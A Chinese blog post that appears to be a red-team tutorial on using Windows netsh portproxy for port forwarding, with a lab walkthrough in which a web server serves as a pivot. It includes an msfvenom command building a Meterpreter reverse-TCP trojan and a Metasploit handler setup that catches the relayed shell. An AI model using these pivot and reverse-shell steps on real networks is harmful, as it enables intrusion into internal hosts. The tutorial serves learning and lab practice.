首页 > 其他分享 >红队隧道应用篇之Netsh端口转发

红队隧道应用篇之Netsh端口转发

时间:2022-12-06 23:56:31浏览次数:46  
标签:Web Netsh 端口 192.168 转发 80 红队 netsh

简介

netsh是从Windows 2000开始就有的一个用于配置网络设备的命令行工具

其中netsh interface portproxy是一个配置网络代理的命令, 可以配置ipv4或ipv6的端口转发代理以及双向端口转发代理


常用功能

添加端口转发(管理员权限)

下述命令的意思是, 若有TCP的链接发送至本机(127.0.0.1)的80端口时, 会将链接转发至目标地址(192.168.52.148)的指定端口(80)

netsh interface portproxy add v4tov4 listenport=80 connectport=80 connectaddress=192.168.52.148

add v4tov4: 添加一条ipv4至ipv4的端口转发记录

listenport: 本机的监听端口

listenaddress: 本机的监听地址, 不填默认为本机地址

connectport: 目标端口

connectaddress: 目标地址


删除端口转发(管理员权限)

netsh interface portproxy delete v4tov4 listenport=80 listenaddress=127.0.0.1

delete v4tov4: 删除一条ipv4到ipv4的端口转发记录


查看所有的端口转发规则

netsh interface portproxy show all

清除所有的端口转发规则

netsh interface portproxy reset

http端口转发

环境拓扑图

由于攻击机(192.168.47.133)和内网主机(192.168.52.148)不在同一个网段上, 因此攻击机不能访问到内网主机web服务的80端口

但是可以通过在Web服务器使用netsh命令将本机的80端口收到的数据转发给内网主机, 来实现攻击机只需访问Web服务器的80端口就能访问到内网主机的80端口

image-20221023220316159


操作步骤

在Web服务器使用管理员权限执行以下cmd命令, 意思是将本机80端口的数据转发至192.168.52.148的80端口

netsh interface portproxy add v4tov4 listenport=80 connectport=80 connectaddress=192.168.52.148

image-20221023214440534


随后攻击机访问Web服务器192.168.47.149:80, 即可访问到内网主机的Web服务

1


MSF实战演示

环境拓扑图

Kali通过将Web服务器作为一个跳板, 将生成的反向木马发送至内网主机, 内网主机运行木马后会主动连接Web服务器, Web服务器通过端口转发功能将内网主机的连接数据转发至kali

image-20221024105351598


操作步骤

在kali生成一个反向木马用于让内网主机主动连接Web服务器的5555端口, 然后将此木马放到内网主机中去

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.52.143 lport=5555 -f exe >reverse.exe

image-20221023234859524


在Web服务器设置端口转发, 将本机5555端口接收到的数据转发至kali的5555端口

netsh interface portproxy add v4tov4 listenport=5555 connectport=5555 connectaddress=192.168.47.134

image-20221024103853543


在kali的MSF创建监听,监听本机的5555端口

msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.47.134
lhost => 192.168.47.134
msf5 exploit(multi/handler) > set lport 5555
lport => 5555
msf5 exploit(multi/handler) > exploit

在内网主机运行木马后, 随后会在MSF返回内网主机的meterpreter会话

image-20221024104154551

标签:Web,Netsh,端口,192.168,转发,80,红队,netsh
From: https://www.cnblogs.com/henry666/p/16961842.html

相关文章

  • LINUX中防护墙放行端口--九五小庞
    1.查看开放的端口firewall-cmd--list-ports 2.防护墙放行3306端口firewall-cmd--zone=public--add-port=3306/tcp--permanent3.重启防火墙,使设置生效systemctlrel......
  • 红队渗透靶场之SickOs1.1
    靶场考察知识shellshock漏洞shellshock即unix系统下的bashshell的一个漏洞,Bash4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定......
  • win7查看端口占用并杀死进程
    netstat-ano--查看所有的端口使用情况netstat-ano|findstr"8080"--查找某一特定端口,看端口被哪个应用占用tasklist|findstr"13453" --通过......
  • 修改远程登录3389端口
    【一】win+R,输入Regedit  【二】 修改端口1,按照路径打开,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp,双击文件,切......
  • 修改SqlServer默认端口 1433
    修改成需要的端口;防火墙出站入站规格需要修改一下;重启SqlServer服务;     ......
  • linux部署服务 开放端口号
    systemctlstatusfirewalld 查看防火墙状态systemctlstopfirewalld 停止防火墙systemctlstartfirewalld启动防火墙设置可用端口开放firewall-cmd--zone=pu......
  • Linux 防火墙,端口操作
    1、开放关闭端口firewall-cmd--zone=public--add-port=5672/tcp--permanent#开放5672端口firewall-cmd--zone=public--remove-port=5672/tcp--permanent#关闭56......
  • docker服务和容器自启动以及添加对外端口映射
    1.docker给已制作好的容器添加对外端口映射#关闭容器dockerstop容器名#关闭docker服务systemctlstopdocker#查看容器存放目录[root@moban~]#dockerinf......
  • Jenkins打包项目提示Docker的2375端口连接超时问题
    Jenkins报错内容如下:[ChecksAPI]Nosuitablecheckspublisherfound.[Docker]ERROR:Failedtoexecstart:Connectto192.168.40.37:2375[/192.168.40.37]failed:c......
  • 思科华为设备端口聚合配置命令对比
    Cisco(config)#intrangee0/0-3 //进入接口组[Huawei-Eth-Trunk1]trunkportg0/0/1//增加成员接口[Huawei-GigabitEthernet0/0/2]eth-trunk1//将当前接口加入Eth-T......